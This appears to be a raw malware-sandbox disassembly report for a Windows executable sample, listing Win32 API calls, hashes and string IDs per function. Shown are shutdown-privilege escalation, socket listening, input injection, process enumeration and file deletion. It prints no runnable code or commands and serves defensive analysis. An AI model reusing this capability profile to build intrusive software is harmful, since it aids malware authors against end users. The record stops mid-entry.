                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: 04489e96c245cd8e1fb3ca42ed25054a4a0b0dd84bac06fe02aa6a73e44125a3
                                                      • Instruction ID: ace9be1c466bcf06575bc5f9feebd5b16edf8dea63c6c435a80a1e3b61f83b94
                                                      • Opcode Fuzzy Hash: 04489e96c245cd8e1fb3ca42ed25054a4a0b0dd84bac06fe02aa6a73e44125a3
                                                      • Instruction Fuzzy Hash: 7B417B35604615AFEB20DF15E888F1ABBA5FF44328F158199E4198BA62C735EC41EBD0
                                                      APIs
                                                        • Part of subcall function 00F816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F8170D
                                                        • Part of subcall function 00F816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F8173A
                                                        • Part of subcall function 00F816C3: GetLastError.KERNEL32 ref: 00F8174A
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00F8E932
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $ $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-3163812486
                                                      • Opcode ID: 3df3506afc2455365faa774766a0a407ad25da8c72ae8746986bdf59081b15d3
                                                      • Instruction ID: 8190633d80e8d0dddc426b331f8201735451c22697fd686ddbecb51a8fec01fb
                                                      • Opcode Fuzzy Hash: 3df3506afc2455365faa774766a0a407ad25da8c72ae8746986bdf59081b15d3
                                                      • Instruction Fuzzy Hash: E501D673A10215ABEB6436B49C86FFF725CAB14760F154521F813E21E2D6E49C40B7E0
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FA1276
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1283
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00FA12BA
                                                      • WSAGetLastError.WSOCK32 ref: 00FA12C5
                                                      • closesocket.WSOCK32(00000000), ref: 00FA12F4
                                                      • listen.WSOCK32(00000000,00000005), ref: 00FA1303
                                                      • WSAGetLastError.WSOCK32 ref: 00FA130D
                                                      • closesocket.WSOCK32(00000000), ref: 00FA133C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                      • String ID:
                                                      • API String ID: 540024437-0
                                                      • Opcode ID: eff2b741c1acbac1118fe8b523fc45e17702f8f192e4bc44930af6a3b6048f0d
                                                      • Instruction ID: 49bb44363143d1217ba9f1d4267bd504b6e721ab007776e141481d7606cfbadb
                                                      • Opcode Fuzzy Hash: eff2b741c1acbac1118fe8b523fc45e17702f8f192e4bc44930af6a3b6048f0d
                                                      • Instruction Fuzzy Hash: 8241B371A002149FD710EF24D4C9B2ABBE5BF46328F198188E8569F2D6C775EC81DBE1
                                                      APIs
                                                      • _free.LIBCMT ref: 00F5B9D4
                                                      • _free.LIBCMT ref: 00F5B9F8
                                                      • _free.LIBCMT ref: 00F5BB7F
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FC3700), ref: 00F5BB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00FF121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F5BC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00FF1270,000000FF,?,0000003F,00000000,?), ref: 00F5BC36
                                                      • _free.LIBCMT ref: 00F5BD4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: d8074f83d3549eaa64f34e48f98252e806ea5aaa03daaf43cb1e25ac4a7ef5c3
                                                      • Instruction ID: 4b75191a798d622d6086f4a3c61c4741c873af12cb6f2401779b992ce8bbcb5f
                                                      • Opcode Fuzzy Hash: d8074f83d3549eaa64f34e48f98252e806ea5aaa03daaf43cb1e25ac4a7ef5c3
                                                      • Instruction Fuzzy Hash: 14C12871D04209AFDB20DF698C45BBA7BB8EF42322F14419AEE90D7251E7349E49F750
                                                      APIs
                                                        • Part of subcall function 00F23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F23A97,?,?,00F22E7F,?,?,?,00000000), ref: 00F23AC2
                                                        • Part of subcall function 00F8E199: GetFileAttributesW.KERNEL32(?,00F8CF95), ref: 00F8E19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F8D420
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F8D470
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F8D481
                                                      • FindClose.KERNEL32(00000000), ref: 00F8D498
                                                      • FindClose.KERNEL32(00000000), ref: 00F8D4A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: e010d355a88b3c3bf07c726b43097bdf762573541127f97acd48079bfb660d1b
                                                      • Instruction ID: cb0b6accfb3799b1fcde47824b6e00202532372cfb71066a621af438742c6838
                                                      • Opcode Fuzzy Hash: e010d355a88b3c3bf07c726b43097bdf762573541127f97acd48079bfb660d1b
                                                      • Instruction Fuzzy Hash: 44317E714083559BC304FF64DC968EFB7A8BE91314F844A2DF4D193191EB34AA09EBA3
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: 2d3e79a5e559855455012afa06a428d4fd30ea96d9d4bffac1d3423bd47daf15
                                                      • Instruction ID: 3f11049aa5774efd851a16d9eaa418128b5e3293ddcf664801ef012c757a354c
                                                      • Opcode Fuzzy Hash: 2d3e79a5e559855455012afa06a428d4fd30ea96d9d4bffac1d3423bd47daf15
                                                      • Instruction Fuzzy Hash: 14C28072E046288FDB29CF28DD407E9B7B5EB44316F1441EAD94DE7240E778AE899F40
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00F964DC
                                                      • CoInitialize.OLE32(00000000), ref: 00F96639
                                                      • CoCreateInstance.OLE32(00FBFCF8,00000000,00000001,00FBFB68,?), ref: 00F96650
                                                      • CoUninitialize.OLE32 ref: 00F968D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: c2a0f805de600e098c773bbed3d8eda5043f78f712d08ca49e5df1e4f4bbb2e8
                                                      • Instruction ID: 48609cd18c5e25000d4d62e1d8b3c8bee6a69a5536ecbde1f074a764a879c82d
                                                      • Opcode Fuzzy Hash: c2a0f805de600e098c773bbed3d8eda5043f78f712d08ca49e5df1e4f4bbb2e8
                                                      • Instruction Fuzzy Hash: EFD14671508211AFD704EF24D891A6BB7E8FF98304F04496DF595CB2A1EB70ED09DBA2
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00FA22E8
                                                        • Part of subcall function 00F9E4EC: GetWindowRect.USER32(?,?), ref: 00F9E504
                                                      • GetDesktopWindow.USER32 ref: 00FA2312
                                                      • GetWindowRect.USER32(00000000), ref: 00FA2319
                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00FA2355
                                                      • GetCursorPos.USER32(?), ref: 00FA2381
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FA23DF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                      • String ID:
                                                      • API String ID: 2387181109-0
                                                      • Opcode ID: 56e51a49baa076f9441df4fffde18538b4f16c3c658b509a86d170571c27dc7c
                                                      • Instruction ID: 64d2f7afbdd1de37d3a2e3e4729a51f924f06913ecae77513880726e8744dcb0
                                                      • Opcode Fuzzy Hash: 56e51a49baa076f9441df4fffde18538b4f16c3c658b509a86d170571c27dc7c
                                                      • Instruction Fuzzy Hash: C031AF72604319AFDB20DF58CC45B9BB7A9FF86314F000A19F98597191DB74E908DBD2
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F99B78
                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F99C8B
                                                        • Part of subcall function 00F93874: GetInputState.USER32 ref: 00F938CB
                                                        • Part of subcall function 00F93874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F93966
                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F99BA8
                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F99C75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                      • String ID: *.*
                                                      • API String ID: 1972594611-438819550
                                                      • Opcode ID: 0215a7a5f94cc8a099bab6d5e60cb1a668e95793b48603f70e75b5ed1acd6933
                                                      • Instruction ID: 43c703567d7c65b144c4acd1e7f418f39da9fcb567e5e9772978fc0ad3afd009
                                                      • Opcode Fuzzy Hash: 0215a7a5f94cc8a099bab6d5e60cb1a668e95793b48603f70e75b5ed1acd6933
                                                      • Instruction Fuzzy Hash: 5E419E71D0820A9FDF14DF68CC85AEEBBB8EF05310F24415AE805A2191EB749F44EFA0
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F39A4E
                                                      • GetSysColor.USER32(0000000F), ref: 00F39B23
                                                      • SetBkColor.GDI32(?,00000000), ref: 00F39B36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Color$LongProcWindow
                                                      • String ID:
                                                      • API String ID: 3131106179-0
                                                      • Opcode ID: f5f0cd0c9dab46e8b321fc957fa11450c3c11f51a0fd9eb78fd416d6bce081de
                                                      • Instruction ID: 2ef734a22eed5c486a1aada3826185b77dde6a05ae1666abe65bd4792c25a9b6
                                                      • Opcode Fuzzy Hash: f5f0cd0c9dab46e8b321fc957fa11450c3c11f51a0fd9eb78fd416d6bce081de
                                                      • Instruction Fuzzy Hash: 43A12D7251C504EEEB28AA3D8C59F7B355DEB82370F14430AF502C6695CAED9D01F672
                                                      APIs
                                                        • Part of subcall function 00FA304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FA307A
                                                        • Part of subcall function 00FA304E: _wcslen.LIBCMT ref: 00FA309B
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00FA185D
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1884
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00FA18DB
                                                      • WSAGetLastError.WSOCK32 ref: 00FA18E6
                                                      • closesocket.WSOCK32(00000000), ref: 00FA1915
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 1601658205-0
                                                      • Opcode ID: 41586b20cff3603bafd14fca7a3d3d37f8bd2469a789b9bcbb7a76b87c88be8e
                                                      • Instruction ID: af677b4c19437f6eaffb3652854be12cbfa6b209ffc700e37293153c9a548549
                                                      • Opcode Fuzzy Hash: 41586b20cff3603bafd14fca7a3d3d37f8bd2469a789b9bcbb7a76b87c88be8e
                                                      • Instruction Fuzzy Hash: 5851A171A002109FDB10EF24D896F2A77E5AB49718F188158F9059F2C3CA79AD41DBE1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 167d258ffff3e7536dd037b34f638a122c89c79a965bffc82fa75ad851d10930
                                                      • Instruction ID: 136d117d9a8a2e03be261fad476be2f19fa4e7bc3bb3ad2ed635408b85e65c9f
                                                      • Opcode Fuzzy Hash: 167d258ffff3e7536dd037b34f638a122c89c79a965bffc82fa75ad851d10930
                                                      • Instruction Fuzzy Hash: F921A271B402155FD7208F1BC8A4BEA7BA5BF89324B588058E8498B251CB75DC42EFD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                      • API String ID: 0-1546025612
                                                      • Opcode ID: 09a290d6986466eeebee4d56017d6a348a0903b6dbd7de9a94a089a38cc5a726
                                                      • Instruction ID: 02aaeafb5e181e8911bf8f96d4bd9eb9961e0e09440ac406ca62c799568d4175
                                                      • Opcode Fuzzy Hash: 09a290d6986466eeebee4d56017d6a348a0903b6dbd7de9a94a089a38cc5a726
                                                      • Instruction Fuzzy Hash: 01A2B271E0122ACBDF24CF58D8417ADB7B1BF54760F2481AAE815A7385DB349D82EF90
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00FAA6AC
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00FAA6BA
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00FAA79C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAA7AB
                                                        • Part of subcall function 00F3CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F63303,?), ref: 00F3CE8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                      • String ID:
                                                      • API String ID: 1991900642-0
                                                      • Opcode ID: ea8633b89171c345566782b9e349aed6cc07c57196545047d2a20ff58fc7dad2
                                                      • Instruction ID: 3341a4913819cfdca9c3fe6f8d6739e8ffa965c959fd623e78c2cfc5f6c1fe37
                                                      • Opcode Fuzzy Hash: ea8633b89171c345566782b9e349aed6cc07c57196545047d2a20ff58fc7dad2
                                                      • Instruction Fuzzy Hash: DC516CB1908310AFD310EF24DC86A6BBBE8FF89754F40492DF58597292EB34D904DB92
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F8AAAC
                                                      • SetKeyboardState.USER32(00000080), ref: 00F8AAC8
                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F8AB36
                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F8AB88
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: cab36e8fe37b7827f3559fef8349db7ffa21147b12e709e4012fb77966c961f0
                                                      • Instruction ID: 20784453e38f90d9e85da834e71c94a5eadbc6967482fff986be84e163788f8e
                                                      • Opcode Fuzzy Hash: cab36e8fe37b7827f3559fef8349db7ffa21147b12e709e4012fb77966c961f0
                                                      • Instruction Fuzzy Hash: B3312830E40608AEFF35EB64CC45BFA7BA6EB84320F08421BF085561D1D3798981E7A2
                                                      APIs
                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00F9CE89
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00F9CEEA
                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00F9CEFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorEventFileInternetLastRead
                                                      • String ID:
                                                      • API String ID: 234945975-0
                                                      • Opcode ID: 721dcc05885f192445d21f6d9843ac81c62bdf3acd3a0f9ec41efc11b388648d
                                                      • Instruction ID: a930dfd03237ffcdf8666e6adfa1e2f30ae554a3dc560ade8fc988f0fc55cddd
                                                      • Opcode Fuzzy Hash: 721dcc05885f192445d21f6d9843ac81c62bdf3acd3a0f9ec41efc11b388648d
                                                      • Instruction Fuzzy Hash: 44219D719007059BEB20DF65C988BA77BF8EB50368F10442EE546D2151E774EE04AFA0
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F882AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      • Opcode ID: da7854c032068076e7eeb66c3b76313dc8873b77e0d13a29df77a7b77236d914
                                                      • Instruction ID: eb39489d8f00cd45b70e3a41c316e7982b5f1f311be5a161bf1357d8fa8a1af8
                                                      • Opcode Fuzzy Hash: da7854c032068076e7eeb66c3b76313dc8873b77e0d13a29df77a7b77236d914
                                                      • Instruction Fuzzy Hash: F6324975A006059FC728DF59C480AAAB7F0FF48760B55C46EE49ADB3A1EB70E942DB40
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F95CC1
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F95D17
                                                      • FindClose.KERNEL32(?), ref: 00F95D5F
                                                      Memory Dump Source
